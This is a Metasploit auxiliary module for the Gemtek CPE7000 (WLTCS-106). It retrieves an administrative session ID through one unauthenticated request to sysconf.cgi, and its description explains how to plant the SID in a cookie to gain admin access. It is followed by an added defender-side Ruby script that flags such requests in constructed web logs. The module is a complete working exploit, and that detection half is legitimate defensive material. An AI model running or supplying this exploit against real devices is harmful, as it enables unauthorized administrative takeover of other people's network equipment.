##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Gemtek CPE7000 - WLTCS-106 Administrator SID Retriever',
      'Description'    => %q{
        A vulnerability exists for Gemtek CPE7000 model ID WLTCS-106 which allows
        unauthenticated remote attackers to retrieve a valid Administrative SID.
        To obtain an administrative web session inject this SID in your client's
        cookie with values as follow: userlevel=2;sid=<SID>
        Tested on Hardware version V02A and Firmware version 01.01.02.082.
      },
      'References'     =>
        [
          [ 'EDB', '39716' ],
          [ 'URL', 'http://www.mentat.is/docs/cpe7000-multiple-vulns.html' ],
          [ 'URL', 'http://www.gemtek.com.tw/' ]
        ],
      'Author'         =>
        [
          'Federico Scalco <fscalco [at] mentat.is>' # Based on the exploit by Federico Ramondino <framondino [at] mentat.is>
        ],
      'License'        => MSF_LICENSE,
      'DisclosureDate' => "Apr 07 2016",
      'DefaultOptions' => { 'RPORT' => 443 }
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base URI to target application', '/']),
        OptBool.new('SSL', [true, 'Use SSL', true])
      ], self.class)
  end

  def run
    @peer = "#{rhost}:#{rport}"

    # A single unauthenticated GET to the login confirmation handler is enough;
    # the device answers with a comma-separated body whose second field is the SID.
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => '/cgi-bin/sysconf.cgi',
      'vars_get' => {
        'page'   => 'ajax.asp',
        'action' => 'login_confirm'
      }
    })

    if !res or res.code != 200
      fail_with(Failure::UnexpectedReply, "Server did not respond in an expected way")
    end

    ssid = res.body.split(',', 2)
    print_good("#{@peer} - Valid root SID retrieved: #{ssid[1]}")
  end
end
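As an added defender-side example (not part of the module or the original disclosure): Ruby that scans HTTP request logs for successful hits on the SID-leaking endpoint the module requests, so that exposure of the management interface can be spotted. It assumes Apache combined-format logs from a reverse proxy or sensor placed in front of the device and a trusted management network; the log lines and the 10.10.0.0/24 range are constructed.

```ruby
require 'uri'
require 'cgi'
require 'ipaddr'

# Constructed sample log lines (Apache "combined" format), not real traffic.
SAMPLE_LOG = <<~LOG
  192.0.2.44 - - [07/Apr/2016:10:12:01 +0000] "GET /cgi-bin/sysconf.cgi?page=ajax.asp&action=login_confirm HTTP/1.1" 200 48 "-" "Mozilla/5.0"
  10.10.0.5 - - [07/Apr/2016:10:12:05 +0000] "GET /cgi-bin/sysconf.cgi?page=ajax.asp&action=login_confirm HTTP/1.1" 200 48 "https://10.10.0.1/" "Mozilla/5.0"
  198.51.100.7 - - [07/Apr/2016:10:13:22 +0000] "GET /cgi-bin/sysconf.cgi?page=status.asp HTTP/1.1" 200 1200 "-" "curl/7.47"
  203.0.113.9 - - [07/Apr/2016:10:14:00 +0000] "GET /cgi-bin/sysconf.cgi?action=login_confirm&page=ajax.asp HTTP/1.1" 200 48 "-" "python-requests/2.9"
LOG

# Management network from which administrative logins are expected (assumption).
TRUSTED_NETS = [IPAddr.new('10.10.0.0/24')].freeze

LOG_RE = /\A(?<src>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<target>\S+) [^"]*" (?<status>\d{3})/

# True when the request target is the endpoint the module queries:
# sysconf.cgi with page=ajax.asp and action=login_confirm, in any order.
def sid_leak_request?(target)
  uri = URI.parse(target)
  return false unless uri.path == '/cgi-bin/sysconf.cgi' && uri.query
  params = CGI.parse(uri.query)
  params['page'] == ['ajax.asp'] && params['action'] == ['login_confirm']
rescue URI::InvalidURIError
  false
end

# Returns one finding per successful (200) request for that endpoint coming
# from an address outside the trusted management networks.
def find_sid_retrievals(log_text, trusted = TRUSTED_NETS)
  findings = []
  log_text.each_line do |line|
    m = LOG_RE.match(line)
    next unless m && m[:status] == '200' && sid_leak_request?(m[:target])
    src = IPAddr.new(m[:src])
    next if trusted.any? { |net| net.include?(src) }
    findings << { src: m[:src], time: m[:ts], target: m[:target] }
  end
  findings
end

if $PROGRAM_NAME == __FILE__
  find_sid_retrievals(SAMPLE_LOG).each do |f|
    puts "ALERT #{f[:time]} #{f[:src]} fetched admin SID via #{f[:target]}"
  end
end
```

On the constructed sample this reports the two untrusted sources (192.0.2.44 and 203.0.113.9) and ignores the management-network login and the unrelated status page request.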